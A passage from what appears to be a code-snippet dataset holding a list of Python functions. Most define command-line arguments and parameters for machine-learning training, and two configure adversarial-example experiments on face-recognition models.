frames.\"\n )\n parser.add_argument(\n \"--warp_loss_weight\", \"-wlw\", default=0, type=int, help=\"Loss weight of warp loss in vid2vid.\"\n )", "def modify_train_args(args: Namespace):\n if args.message.startswith('tetra'):\n setattr(args, 'tetra', True)\n else:\n setattr(args, 'tetra', False)\n\n # shuffle=False for custom sampler\n if args.shuffle_pairs:\n setattr(args, 'no_shuffle', True)\n\n setattr(args, 'device', torch.device('cuda' if torch.cuda.is_available() else 'cpu'))", "def _set_params(self, estimator_args, scaler_args, execution_args, metric_args=None, dim_reduction_args=None):\n \n # Set default values which will be used if execution arguments are not passed\n \n # Default parameters:\n self.model.overwrite = True\n self.model.debug = False\n self.model.test_size = 0.33\n self.model.cv = 0\n self.model.time_series_split = 0\n self.model.max_train_size = None\n self.model.random_state = 42\n self.model.compress = 3\n self.model.retain_data = False\n self.model.scale_hashed = True\n self.model.scale_vectors = True\n self.model.scaler = \"StandardScaler\"\n self.model.scaler_kwargs = {}\n self.model.estimator_kwargs = {}\n self.model.missing = \"zeros\"\n self.model.calc_feature_importances = False\n self.model.importances_n_repeats = 30\n self.model.lags= None\n self.model.lag_target = False\n self.model.scale_target = False\n self.model.scale_lag_target= True\n self.model.make_stationary = None\n self.model.stationarity_lags = [1]\n self.model.using_keras = False\n self.model.current_sample_as_input = True\n self.model.prediction_periods = 1\n \n # Default metric parameters:\n if metric_args is None:\n self.model.metric_args = {}\n \n # Set execution parameters\n \n # If the execution key word arguments were included in the request, get the parameters and values\n if len(execution_args) > 0:\n \n # Transform the string of arguments into a dictionary\n execution_args = utils.get_kwargs(execution_args)\n \n # Set the overwite parameter if any existing model with the specified name should be overwritten\n if 'overwrite' in execution_args:\n self.model.overwrite = 'true' == execution_args['overwrite'].lower()\n \n # Set the test_size parameter that will be used to split the samples into training and testing data sets\n # Default value is 0.33, i.e. we use 66% of the samples for training and 33% for testing\n if 'test_size' in execution_args:\n self.model.test_size = utils.atof(execution_args['test_size'])\n\n # Enable K-fold cross validation. For more information see: http://scikit-learn.org/stable/modules/cross_validation.html#multimetric-cross-validation\n # Default value is 0 in which case a simple holdout strategy based on the test_size parameter is used.\n # If cv > 0 then the model is validated used K = cv folds and the test_size parameter is ignored.\n if 'cv' in execution_args:\n self.model.cv = utils.atoi(execution_args['cv'])\n \n # Enable timeseries backtesting using TimeSeriesSplit. https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.TimeSeriesSplit.html\n # This will select the a validation strategy appropriate for time series and sequential data.\n # The feature definitions must include an 'identifier' field which can be used to sort the series into the correct order.\n # The integer supplied in this parameter will split the data into the given number of subsets for training and testing.\n if 'time_series_split' in execution_args:\n self.model.time_series_split = utils.atoi(execution_args['time_series_split'])\n\n # This parameter can be used together with time_series_split.\n # It specifies the maximum samples to be used for training in each split, which allows for rolling/ walk forward validation.\n if 'max_train_size' in execution_args:\n self.model.max_train_size = utils.atoi(execution_args['max_train_size'])\n\n # Add lag observations to the feature matrix. Only applicable for Keras models.\n # An identifier field must be included in the feature definitions to correctly sort the data for this capability.\n # For e.g. if lags=2, features from the previous two samples will be concatenated as input features for the current sample.\n # This is useful for framing timeseries and sequence prediction problems into 3D or 4D data required for deep learning.\n if 'lags' in execution_args:\n self.model.lags = utils.atoi(execution_args['lags'])\n\n # Include targets in the lag observations\n # If True an additional feature will be created for each sample using the previous value of y \n if 'lag_target' in execution_args:\n self.model.lag_target = 'true' == execution_args['lag_target'].lower()\n \n # Scale the target before fitting\n # The scaling will be inversed before predictions so they are returned in the original scale \n if 'scale_target' in execution_args:\n self.model.scale_target = 'true' == execution_args['scale_target'].lower()\n\n # Scale lag values of the targets before fitting\n # Even if scale_target is set to false, the lag values of targets being used as features can be scaled by setting this to true \n if 'scale_lag_target' in execution_args:\n self.model.scale_lag_target = 'true' == execution_args['scale_lag_target'].lower()\n\n # Make the target series more stationary. This only applies to sequence prediction problems.\n # Valid values are 'log' in which case we apply a logarithm to the target values,\n # or 'difference' in which case we transform the targets into variance from the previous value.\n # The transformation will be reversed before returning predictions.\n if 'make_stationary' in execution_args:\n self.model.make_stationary = execution_args['make_stationary'].lower()\n\n # Provide lags periods for differencing\n # By default the difference will be done with lag = 1. Alternate lags can be provided by passing a list of lags as a list.\n # e.g. 'stationarity_lags=1;12|list|int'\n if 'stationarity_lags' in execution_args:\n self.model.stationarity_lags = utils.get_kwargs_by_type({'stationarity_lags': execution_args['stationarity_lags']})['stationarity_lags']\n\n # Specify if the current sample should be used as input to the model\n # This is to allow for models that only use lag observations to make future predictions\n if 'current_sample_as_input' in execution_args:\n self.model.current_sample_as_input = 'true' == execution_args['current_sample_as_input'].lower()\n\n # Specify the number of predictions expected from the model\n # This can be used to get a model to predict the next m periods given inputs for the previous n periods.\n # This is only valid for Keras models which have a final output layer with more than one node\n if 'prediction_periods' in execution_args:\n self.model.prediction_periods = utils.atoi(execution_args['prediction_periods'])\n \n # Seed used by the random number generator when generating the training testing split\n if 'random_state' in execution_args:\n self.model.random_state = utils.atoi(execution_args['random_state'])\n \n # Compression level between 1-9 used by joblib when saving the model\n if 'compress' in execution_args:\n self.model.compress = utils.atoi(execution_args['compress'])\n \n # Flag to determine if the training and test data should be saved in the model\n if 'retain_data' in execution_args:\n self.model.retain_data = 'true' == execution_args['retain_data'].lower()\n\n # Flag to determine if feature importances should be calculated when the fit method is called\n if 'calculate_importances' in execution_args:\n self.model.calc_feature_importances = 'true' == execution_args['calculate_importances'].lower()\n\n # Sets the number of times a feature is randomly shuffled during the feature importance calculation\n if 'importances_n_repeats' in execution_args:\n self.model.importances_n_repeats = utils.atoi(execution_args['importances_n_repeats'])\n \n # Set the debug option for generating execution logs\n # Valid values are: true, false\n if 'debug' in execution_args:\n self.model.debug = 'true' == execution_args['debug'].lower()\n \n # Additional information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n # Increment log counter for the class. Each instance of the class generates a new log.\n self.__class__.log_no += 1\n\n # Create a log file for the instance\n # Logs will be stored in ..\\logs\\SKLearn Log <n>.txt\n self.logfile = os.path.join(os.getcwd(), 'logs', 'SKLearn Log {}.txt'.format(self.log_no))\n \n # Create dictionary of parameters to display for debug\n self.exec_params = {\"overwrite\":self.model.overwrite, \"test_size\":self.model.test_size, \"cv\":self.model.cv,\\\n \"time_series_split\": self.model.time_series_split, \"max_train_size\":self.model.max_train_size, \"lags\":self.model.lags,\\\n \"lag_target\":self.model.lag_target, \"scale_target\":self.model.scale_target, \"make_stationary\":self.model.make_stationary,\\\n \"random_state\":self.model.random_state, \"compress\":self.model.compress, \"retain_data\":self.model.retain_data,\\\n \"calculate_importances\": self.model.calc_feature_importances, \"importances_n_repeats\": self.model.importances_n_repeats,\\\n \"debug\":self.model.debug}\n\n self._print_log(1)\n \n # If the scaler key word arguments were included in the request, get the parameters and values\n if len(scaler_args) > 0:\n \n # Transform the string of arguments into a dictionary\n scaler_args = utils.get_kwargs(scaler_args)\n \n # Set scaler arguments that will be used when preprocessing the data\n # Valid values are: StandardScaler, MinMaxScaler, MaxAbsScaler, RobustScaler and QuantileTransformer\n # More information here: http://scikit-learn.org/stable/modules/preprocessing.html\n if 'scaler' in scaler_args:\n self.model.scaler = scaler_args.pop('scaler')\n \n if 'missing' in scaler_args:\n self.model.missing = scaler_args.pop('missing').lower()\n \n if 'scale_hashed' in scaler_args:\n self.model.scale_hashed = 'true' == scaler_args.pop('scale_hashed').lower()\n \n if 'scale_vectors' in scaler_args:\n self.model.scale_vectors = 'true' == scaler_args.pop('scale_vectors').lower()\n \n # Get the rest of the scaler parameters, converting values to the correct data type\n self.model.scaler_kwargs = utils.get_kwargs_by_type(scaler_args) \n else:\n err = \"Arguments for scaling did not include the scaler name e.g StandardScaler\"\n raise Exception(err)\n \n # If the estimator key word arguments were included in the request, get the parameters and values\n if len(estimator_args) > 0:\n \n # Transform the string of arguments into a dictionary\n estimator_args = utils.get_kwargs(estimator_args)\n \n # Set estimator arguments that will be used when preprocessing the data\n # The parameters available will depend on the selected estimator\n # More information here: http://scikit-learn.org/stable/modules/classes.html#api-reference\n if 'estimator' in estimator_args:\n self.model.estimator = estimator_args.pop('estimator')\n \n # Set the estimator type for the model\n if self.model.estimator in self.classifiers:\n self.model.estimator_type = \"classifier\"\n elif self.model.estimator in self.regressors:\n self.model.estimator_type = \"regressor\"\n elif self.model.estimator in self.decomposers:\n self.model.estimator_type = \"decomposer\"\n elif self.model.estimator in self.clusterers:\n self.model.estimator_type = \"clusterer\"\n else:\n err = \"Unknown estimator class: {0}\".format(self.model.estimator)\n raise Exception(err)\n\n # Get the rest of the estimator parameters, converting values to the correct data type\n self.model.estimator_kwargs = utils.get_kwargs_by_type(estimator_args) \n else:\n err = \"Arguments for estimator did not include the estimator class e.g. RandomForestClassifier\"\n raise Exception(err)\n \n # If key word arguments for model evaluation metrics are included in the request, get the parameters and values\n if metric_args is not None and len(metric_args) > 0:\n # Transform the string of arguments into a dictionary\n metric_args = utils.get_kwargs(metric_args)\n \n # Get the metric parameters, converting values to the correct data type\n self.model.metric_args = utils.get_kwargs_by_type(metric_args) \n \n # If key word arguments for dimensionality reduction are included in the request, get the parameters and values\n if dim_reduction_args is not None and len(dim_reduction_args) > 0:\n # Transform the string of arguments into a dictionary\n dim_reduction_args = utils.get_kwargs(dim_reduction_args)\n \n # Set dim_reduction arguments that will be used after preprocessing the data\n # The parameters available will depend on the selected dimensionality reduction method\n # Acceptable classes are PCA, KernelPCA, IncrementalPCA, TruncatedSVD\n # More information here: http://scikit-learn.org/stable/modules/classes.html#api-reference\n if 'reduction' in dim_reduction_args:\n self.model.reduction = dim_reduction_args.pop('reduction')\n \n # Get the rest of the dim_reduction parameters, converting values to the correct data type\n self.model.dim_reduction_args = utils.get_kwargs_by_type(dim_reduction_args) \n else:\n err = \"Arguments for dimensionality reduction did not include the class e.g. PCA\"\n raise Exception(err)\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(2)", "def __init__(self, **kwargs):\n\n args = {\n 'nobs': None, # Number of observations\n 'npred': None, # Number of predictors\n 'nrelpred': None, # Number of relevant predictors\n 'relpos': None, # Position of relevant predictor components\n 'gamma': None, # Decay factor of eigenvalue of predictor\n 'rsq': None, # Coefficient of determination\n 'sim_type': None, # Type of simulation: univariate, bivariate, multivariate\n }\n for key, value in args.items():\n setattr(self, key, value)\n\n for key, value in kwargs.items():\n setattr(self, key, value)", "def pre_build_args(self, args):\n args = super(SubtitlesTrainer, self).pre_build_args(args)\n # Set up method specific model and training args\n if args.method in ['b-skip', 'f-skip', 'b-mask', 'f-mask']:\n # No direct connection from features to z in encoder\n args.model_args['feat_to_z'] = True\n # Do not add unimodal ELBO training loss for RNN methods\n args.train_args['uni_loss'] = True\n return args", "def fixture_wrapper_arguments():\n n_features = 9\n classes = [\"a\", \"b\", \"c\"]\n\n return n_features, classes", "def get_arguments():\n\n # Creates the ArgumentParser\n parser = argparse.ArgumentParser(usage='Creates an ensemble of classifiers based on majority voting.')\n\n # Adds a dataset argument with pre-defined choices\n parser.add_argument('dataset', help='Dataset identifier', choices=['RSDataset', 'RSSCN7', 'UCMerced_LandUse'])\n\n return parser.parse_args()", "def add_required_arguments(self, *args):\n self._add_sample_specific_arguments(True, *args)", "def required_parameters(self):\n return ['seed', 'run_params']", "def define_parameters(self):\n self.add_argument('--prefix', dest='prefix', type=str, optional=False,\n help='prefix for file names')\n self.add_argument('--sleepLength',\n dest = 'sleepLength',\n type = str,\n optional = True,\n help ='time to sleep before performing plugin action',\n default = '0')", "def define_parameters(self):\n\n self.add_argument('--input1',dest='input1',type=str,optional=False,\n help='What file do you want to upload?')\n self.add_argument('--input2',dest='input2',type=str,optional=False,\n help='What file do you want to upload?')", "def test_intent_classifier_set_params(self):\n pass", "def test_arguments(self):\n\n h.test_function_arguments(\n func=BaseTransformer.fit,\n expected_arguments=[\"self\", \"X\", \"y\"],\n expected_default_values=(None,),\n )", "def args(self, args):\n self._instructions_setter('ARG', args)", "def initialize():\n\n parser = build_arg_parser()\n par = parser.parse_known_args()[0]\n\n # Main arguments.\n set('run_mode', par.run_mode)\n set('input_files', par.image)\n\n # Sub-parser specific arguments.\n if par.run_mode == 'train':\n\n set('batch_size', par.batch_size)\n set('drop', par.drop)\n set('epochs', par.epochs)\n set('model', par.model)\n set('level', par.level)\n set('vfrac', par.vfrac)\n set('data_augm', par.data_augm)\n set('summary', par.summary)\n set('outdir', par.outdir)\n # Parameters associated with super-resolution. \n set('super_resolution', par.super_resolution)\n set('generator', par.generator)\n set('discriminator', par.discriminator)\n\n elif par.run_mode == 'predict':\n\n set('tile_edge', par.edge)\n set('model', par.model)\n set('save_conv2d_kernels', par.save_conv2d_kernels) \n set('save_conv2d_outputs', par.save_conv2d_outputs) \n set('colormap', par.colormap)\n # Parameters associated with super-resolution. \n set('super_resolution', par.super_resolution)\n set('generator', par.generator)\n\n elif par.run_mode == 'diagnose': \n \n set('model', par.model) \n \n else:\n \n pass", "def parameters(self):", "def add_args(parser):\n rescore_add_args(parser)\n parser.add_argument(\n \"--rl-weight\",\n type=float,\n default=0.1,\n help=\"trade-off coefficient of rl loss\",\n )\n parser.add_argument(\n \"--rl-num-trajectory\",\n type=int,\n default=3,\n help=\"num trajectory in rl training\",\n )", "def __add_arguments__(cls, parser):", "def set_params(self, *arg):\n pass", "def handle_arguments():\n # process the command options\n parser = argparse.ArgumentParser()\n parser.add_argument('images', type=str, help='provide path in style: '\n r'\"kaggle\\input\\bengaliai-cv19\\images.npy\"')\n parser.add_argument('labels', type=str, help='provide path in style: '\n r'\"kaggle\\input\\bengaliai-cv19\\labels.csv\"')\n parser.add_argument('-t', '--test_ratio', type=float, default=0.2,\n help='proportion of data for testing, default: 0.2')\n parser.add_argument('-s', '--seed', type=int, default=None, help='seed '\n 'used for consistent data splitting, default: None')\n parser.add_argument('-a', '--data_augmentation', action='store_true',\n help='switch to augment the images')\n drop_info_fns = ['cutout', 'gridmask', 'None'] # info dropping algorithms\n parser.add_argument('-d', '--drop_info_fn', type=str, choices=drop_info_fns,\n default=None, help='whether cutout, GridMask, or no '\n 'information dropping algorithm is used, default: None')\n parser.add_argument('-c', '--class_balancing', action='store_true',\n help='switch to perform class balancing')\n parser.add_argument('-b', '--batch_size', type=int, default=32,\n help='batch size of DataLoader objects, default: 32')\n parser.add_argument('-l', '--label_smoothing', action='store_true',\n help='switch to use soft targets in loss computation')\n parser.add_argument('-e', '--epochs', type=int, default=50, help='number '\n 'of iterations over training data, default: 50')\n parser.add_argument('-m', '--model', type=str, default='model.pt',\n help='path to save trained model, default: \"model.pt\"')\n\n # parse and print arguments\n args = parser.parse_args()\n for arg in vars(args):\n print(f'{arg.upper()}: {getattr(args, arg)}')\n\n return args", "def _folium_kwargs(self):", "def set_params(self, **params):\n if('threshold' in params.keys()):\n self.threshold = params['threshold']\n if('subsample' in params.keys()):\n self.subsample = params['subsample']\n if('estimator' in params.keys()):\n self.estimator = params['estimator']\n if('n_folds' in params.keys()):\n self.n_folds = params['n_folds']\n if('stratify' in params.keys()):\n self.stratify = params['stratify']\n if('random_state' in params.keys()):\n self.random_state = params['random_state']\n if('n_jobs' in params.keys()):\n self.n_jobs = params['n_jobs']", "def set_parameters(api_name='',\r\n targeted_flag='true',\r\n tv_flag='false',\r\n hinge_flag='true',\r\n cos_flag='false',\r\n interpolation='bilinear',\r\n model_type='large',\r\n loss_type='triplet',\r\n dataset_type='vgg',\r\n target_model='large',\r\n target_loss='center',\r\n target_dataset='VGG',\r\n attack='CW',\r\n norm='2',\r\n epsilon=0.1,\r\n iterations=20,\r\n binary_steps=5,\r\n learning_rate=0.01,\r\n epsilon_steps=0.01,\r\n init_const=0.3,\r\n mean_loss='embeddingmean',\r\n batch_size=-1,\r\n margin=15.0,\r\n amplification=6.0,\r\n granularity='normal',\r\n whitebox_target=False,\r\n pair_flag='false'):\r\n \r\n params = {}\r\n params['model_type'] = model_type\r\n params['loss_type'] = loss_type\r\n params['dataset_type'] = dataset_type\r\n params['target_model'] = target_model\r\n params['target_loss'] = target_loss\r\n params['target_dataset'] = target_dataset\r\n params['attack'] = attack\r\n params['norm'] = norm\r\n params['epsilon'] = epsilon\r\n params['iterations'] = iterations\r\n params['binary_steps'] = binary_steps\r\n params['learning_rate'] = learning_rate\r\n params['epsilon_steps'] = epsilon_steps\r\n params['init_const'] = init_const\r\n params['mean_loss'] = mean_loss\r\n params['batch_size'] = batch_size\r\n params['test_dir'] = TEST_DIR\r\n params['full_dir'] = FULL_DIR\r\n params['whitebox_target'] = whitebox_target\r\n params['targeted_flag'] = string_to_bool(targeted_flag)\r\n params['tv_flag'] = string_to_bool(tv_flag)\r\n params['hinge_flag'] = string_to_bool(hinge_flag)\r\n params['cos_flag'] = string_to_bool(cos_flag)\r\n params['pair_flag'] = string_to_bool(pair_flag)\r\n params['api_name'] = api_name\r\n\r\n if model_type == 'small' and loss_type == 'center':\r\n params['pixel_max'] = 1.0\r\n params['pixel_min'] = -1.0\r\n else:\r\n params['pixel_max'] = 1.0\r\n params['pixel_min'] = 0.0\r\n\r\n if dataset_type == 'vggsmall' and not whitebox_target:\r\n params['align_dir'] = VGG_ALIGN_160_DIR\r\n params['test_dir'] = VGG_TEST_DIR\r\n elif model_type == 'large' or dataset_type == 'casia':\r\n params['align_dir'] = ALIGN_160_DIR\r\n elif model_type == 'small':\r\n params['align_dir'] = ALIGN_96_DIR\r\n else:\r\n ValueError('ValueError: Argument must be either \"small\" or \"large\".')\r\n \r\n if interpolation == 'nearest':\r\n params['interpolation'] = cv2.INTER_NEAREST\r\n elif interpolation == 'bilinear':\r\n params['interpolation'] = cv2.INTER_LINEAR\r\n elif interpolation == 'bicubic':\r\n params['interpolation'] = cv2.INTER_CUBIC\r\n elif interpolation == 'lanczos':\r\n params['interpolation'] = cv2.INTER_LANCZOS4\r\n elif interpolation == 'super':\r\n ValueError('ValueError: Super interpolation not yet implemented.')\r\n else:\r\n raise ValueError('ValueError: Argument must be of the following, [nearest, bilinear, bicubic, lanczos, super].')\r\n\r\n if granularity == 'fine':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 20.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.2)\r\n elif granularity == 'normal':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 10.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.5)\r\n elif granularity == 'coarse':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 5.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 1.0)\r\n elif granularity == 'coarser':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.2)\r\n elif granularity == 'coarsest':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 1.0)\r\n elif granularity == 'single':\r\n params['margin_list'] = np.array([margin])\r\n params['amp_list'] = np.array([amplification])\r\n elif granularity == 'fine-tuned':\r\n params['margin_list'] = np.arange(10.0, margin, 1.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.2)\r\n elif granularity == 'coarse-single':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.array([1.0])\r\n elif granularity == 'api-eval':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.8)\r\n else:\r\n raise ValueError('ValueError: Argument must be of the following, [fine, normal, coarse, coarser, single].')\r\n\r\n if params['hinge_flag']:\r\n params['attack_loss'] = 'hinge'\r\n else:\r\n params['attack_loss'] = 'target'\r\n if not params['targeted_flag']:\r\n params['attack_loss'] = 'target'\r\n if norm == 'inf':\r\n norm_name = 'i'\r\n else:\r\n norm_name = '2'\r\n if params['tv_flag']:\r\n tv_name = '_tv'\r\n else:\r\n tv_name = ''\r\n if params['cos_flag']:\r\n cos_name = '_cos'\r\n else:\r\n cos_name = ''\r\n\r\n params['model_name'] = '{}_{}'.format(model_type, loss_type)\r\n if dataset_type == 'casia' or dataset_type == 'vggsmall':\r\n params['model_name'] = dataset_type\r\n params['target_model_name'] = '{}_{}_{}'.format(target_model, target_loss, target_dataset)\r\n params['attack_name'] = '{}_l{}{}{}'.format(attack.lower(), norm_name, tv_name, cos_name)\r\n params['directory_path'] = os.path.join(ROOT,\r\n OUT_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/full'.format(params['attack_loss']))\r\n params['directory_path_crop'] = os.path.join(ROOT,\r\n OUT_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/crop'.format(params['attack_loss']))\r\n params['directory_path_npz'] = os.path.join(ROOT,\r\n OUT_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/npz'.format(params['attack_loss']))\r\n params['api_path'] = os.path.join(ROOT,\r\n API_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/npz'.format(params['attack_loss']))\r\n if params['mean_loss'] == 'embedding':\r\n params['directory_path'] += '_mean'\r\n params['directory_path_crop'] += '_mean'\r\n params['directory_path_npz'] += '_mean'\r\n params['api_path'] += '_mean'\r\n\r\n return params", "def configure_args(self):\n super(InstaApriori, self).configure_args()\n self.add_passthru_arg('-iteration', type=int, help=\"The current iteration. Not used as a command line argument\")\n self.add_passthru_arg('--k', type=int, default=3, help=\"Specify the maximum size of itemsets to find\")\n self.add_passthru_arg('--s', type=float, help=\"Specify the minimum support threshold\")\n self.add_passthru_arg('--c', type=float, default=0, help=\"Specify the minimum confidence threshold\")\n self.add_file_arg('--f', default='frequent.txt',\n help=\"Specify the name of the file used to store frequent itemsets\")", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Rdy[1.,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rbk[1.,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rqcd_emu[1,0.0,10.0]\");\n self.modelBuilder.doSet(\"POI\",\"Rbk,Rdy,Rqcd_emu\")", "def parameters(self):\n pass", "def predict(self, **kwargs):\n raise NotImplementedError", "def __init__(**params):", "def set_parameters(targeted_flag='true',\r\n tv_flag='false',\r\n hinge_flag='true',\r\n cos_flag='false',\r\n interpolation='bilinear',\r\n model_type='small',\r\n loss_type='center',\r\n dataset_type='vgg',\r\n attack='CW',\r\n norm='2',\r\n epsilon=0.1,\r\n iterations=100,\r\n binary_steps=8,\r\n learning_rate=0.01,\r\n epsilon_steps=0.01,\r\n init_const=0.3,\r\n mean_loss='embeddingmean',\r\n batch_size=-1,\r\n margin=5.0,\r\n amplification=2.0):\r\n params = {}\r\n\r\n params['model_type'] = model_type\r\n params['loss_type'] = loss_type\r\n params['dataset_type'] = dataset_type\r\n params['attack'] = attack\r\n params['norm'] = norm\r\n params['epsilon'] = epsilon\r\n params['iterations'] = iterations\r\n params['binary_steps'] = binary_steps\r\n params['learning_rate'] = learning_rate\r\n params['epsilon_steps'] = epsilon_steps\r\n params['init_const'] = init_const\r\n params['mean_loss'] = mean_loss\r\n params['batch_size'] = batch_size\r\n params['targeted_flag'] = string_to_bool(targeted_flag)\r\n params['tv_flag'] = string_to_bool(tv_flag)\r\n params['hinge_flag'] = string_to_bool(hinge_flag)\r\n params['cos_flag'] = string_to_bool(cos_flag)\r\n params['margin'] = margin\r\n params['amp'] = amplification\r\n\r\n if model_type == 'small' and loss_type == 'center':\r\n params['pixel_max'] = 1.0\r\n params['pixel_min'] = -1.0\r\n else:\r\n params['pixel_max'] = 1.0\r\n params['pixel_min'] = 0.0\r\n\r\n if (dataset_type == 'vggsmall'):\r\n params['align_dir'] = VGG_ALIGN_160_DIR\r\n params['test_dir'] = VGG_TEST_DIR\r\n elif model_type == 'large' or dataset_type == 'casia':\r\n params['align_dir'] = ALIGN_160_DIR\r\n elif model_type == 'small':\r\n params['align_dir'] = ALIGN_96_DIR\r\n else:\r\n ValueError('ValueError: Argument must be either \"small\" or \"large\".')\r\n \r\n if interpolation == 'nearest':\r\n params['interpolation'] = cv2.INTER_NEAREST\r\n elif interpolation == 'bilinear':\r\n params['interpolation'] = cv2.INTER_LINEAR\r\n elif interpolation == 'bicubic':\r\n params['interpolation'] = cv2.INTER_CUBIC\r\n elif interpolation == 'lanczos':\r\n params['interpolation'] = cv2.INTER_LANCZOS4\r\n elif interpolation == 'super':\r\n print('finish later')\r\n else:\r\n raise ValueError('ValueError: Argument must be of the following, [nearest, bilinear, bicubic, lanczos, super].')\r\n\r\n if params['hinge_flag']:\r\n params['attack_loss'] = 'hinge'\r\n else:\r\n params['attack_loss'] = 'target'\r\n if not params['targeted_flag']:\r\n params['attack_loss'] = 'target'\r\n if norm == 'inf':\r\n norm_name = 'i'\r\n else:\r\n norm_name = '2'\r\n if params['tv_flag']:\r\n tv_name = '_tv'\r\n else:\r\n tv_name = ''\r\n if params['cos_flag']:\r\n cos_name = '_cos'\r\n else:\r\n cos_name = ''\r\n\r\n params['model_name'] = '{}_{}'.format(model_type, loss_type)\r\n if dataset_type == 'casia' or dataset_type == 'vggsmall':\r\n params['model_name'] = dataset_type\r\n params['attack_name'] = '{}_l{}{}{}'.format(attack.lower(), norm_name, tv_name, cos_name)\r\n\r\n return params", "def set(self, **kwargs):\n for key in kwargs:\n if key in self.bool_params:\n self.bool_params[key] = kwargs[key]\n elif key in self.int_params:\n self.int_params[key] = kwargs[key]\n elif key in self.str_params:\n self.str_params[key] = kwargs[key]\n elif key in self.float_params:\n self.float_params[key] = kwargs[key]\n else:\n raise RuntimeError('MOPAC calculator: unknown keyword: ' + key)", "def load_args():\n parser = argparse.ArgumentParser(description=\"Classify and predict digits using the mnist dataset\")\n parser.add_argument('mode', help='the mode to run in: fit, model or predict')\n parser.add_argument('--algo', help='which algorithm to use: RandomForest, KNN')\n return parser.parse_args()", "def Params(cls):\n p = super().Params()\n p.Define('train_task', None, 'Underlying task')\n p.Define('decode_task', None, 'Underlying task')\n p.Define('train_dataset_name', None, '')\n p.Define('decode_dataset_name', None, '')\n p.Define('train_steps_per_loop', 0, '')\n p.Define('decode_steps_per_loop', 0, '')\n return p", "def setup_args():\n parser = ParlaiParser()\n parser.add_argument(\n '-n',\n '--num-episodes',\n default=-1,\n type=int,\n help='Total number of episodes to convert, -1 to convert all examples',\n )\n parser.add_argument(\n '-of',\n '--outfile',\n default=None,\n type=str,\n help='Output file where to save, by default will be created in /tmp',\n )\n parser.add_argument(\n '-s1id', '--speaker-0-id', type=str, help='Speaker id of agent who speaks first'\n )\n parser.add_argument(\n '-s1id',\n '--speaker-1-id',\n type=str,\n help='Speaker id of agent who speaks second',\n )\n parser.add_argument(\n '--prepended-context',\n type='bool',\n default=False,\n help='specify if the context is prepended to the first act',\n )\n parser.add_argument('-ltim', '--log-every-n-secs', type=float, default=10)\n parser.set_defaults(datatype='train:ordered')\n\n return parser", "def load_arguments(parser):\n\n\t# paths\n\tparser.add_argument('--train_path_src', type=str, required=True, help='train src dir')\n\tparser.add_argument('--train_path_tgt', type=str, required=True, help='train tgt dir')\n\tparser.add_argument('--path_vocab_src', type=str, required=True, help='vocab src dir')\n\tparser.add_argument('--path_vocab_tgt', type=str, required=True, help='vocab tgt dir')\n\tparser.add_argument('--dev_path_src', type=str, default=None, help='dev src dir')\n\tparser.add_argument('--dev_path_tgt', type=str, default=None, help='dev tgt dir')\n\tparser.add_argument('--save', type=str, required=True, help='model save dir')\n\tparser.add_argument('--load', type=str, default=None, help='model load dir')\n\tparser.add_argument('--load_embedding_src', type=str, default=None, help='pretrained src embedding')\n\tparser.add_argument('--load_embedding_tgt', type=str, default=None, help='pretrained tgt embedding')\n\tparser.add_argument('--train_attscore_path', type=str, default=None, help='train set reference attention scores')\n\tparser.add_argument('--dev_attscore_path', type=str, default=None, help='dev set reference attention scores')\n\n\t# model\n\tparser.add_argument('--embedding_size_enc', type=int, default=200, help='encoder embedding size')\n\tparser.add_argument('--embedding_size_dec', type=int, default=200, help='decoder embedding size')\n\tparser.add_argument('--hidden_size_enc', type=int, default=200, help='encoder hidden size')\n\tparser.add_argument('--num_bilstm_enc', type=int, default=2, help='number of encoder bilstm layers')\n\tparser.add_argument('--num_unilstm_enc', type=int, default=0, help='number of encoder unilstm layers')\n\tparser.add_argument('--hidden_size_dec', type=int, default=200, help='encoder hidden size')\n\tparser.add_argument('--num_unilstm_dec', type=int, default=2, help='number of encoder bilstm layers')\n\tparser.add_argument('--hard_att', type=str, default='False', help='use hard attention or not')\n\tparser.add_argument('--att_mode', type=str, default='bahdanau', \\\n\t\t\t\t\t\t\thelp='attention mechanism mode - bahdanau / hybrid / dot_prod')\t\n\tparser.add_argument('--hidden_size_att', type=int, default=1, \\\n\t\t\t\t\t\t\thelp='hidden size for bahdanau / hybrid attention')\n\tparser.add_argument('--hidden_size_shared', type=int, default=200, \\\n\t\t\t\t\t\t\thelp='transformed att output hidden size (set as hidden_size_enc)')\n\tparser.add_argument('--additional_key_size', type=int, default=0, \\\n\t\t\t\t\t\t\thelp='additional attention key size: keys = [values, add_feats]')\n\n\t# train \n\tparser.add_argument('--random_seed', type=int, default=666, help='random seed')\t\n\tparser.add_argument('--max_seq_len', type=int, default=32, help='maximum sequence length')\n\tparser.add_argument('--batch_size', type=int, default=64, help='batch size')\t\n\tparser.add_argument('--embedding_dropout', type=float, default=0.0, help='embedding dropout')\n\tparser.add_argument('--dropout', type=float, default=0.0, help='dropout')\n\tparser.add_argument('--num_epochs', type=int, default=10, help='number of training epoches')\n\tparser.add_argument('--learning_rate', type=float, default=0.001, help='learning rate')\n\tparser.add_argument('--residual', type=str, default='False', help='residual connection')\n\tparser.add_argument('--max_grad_norm', type=float, default=1.0, help='optimiser gradient norm clipping: max grad 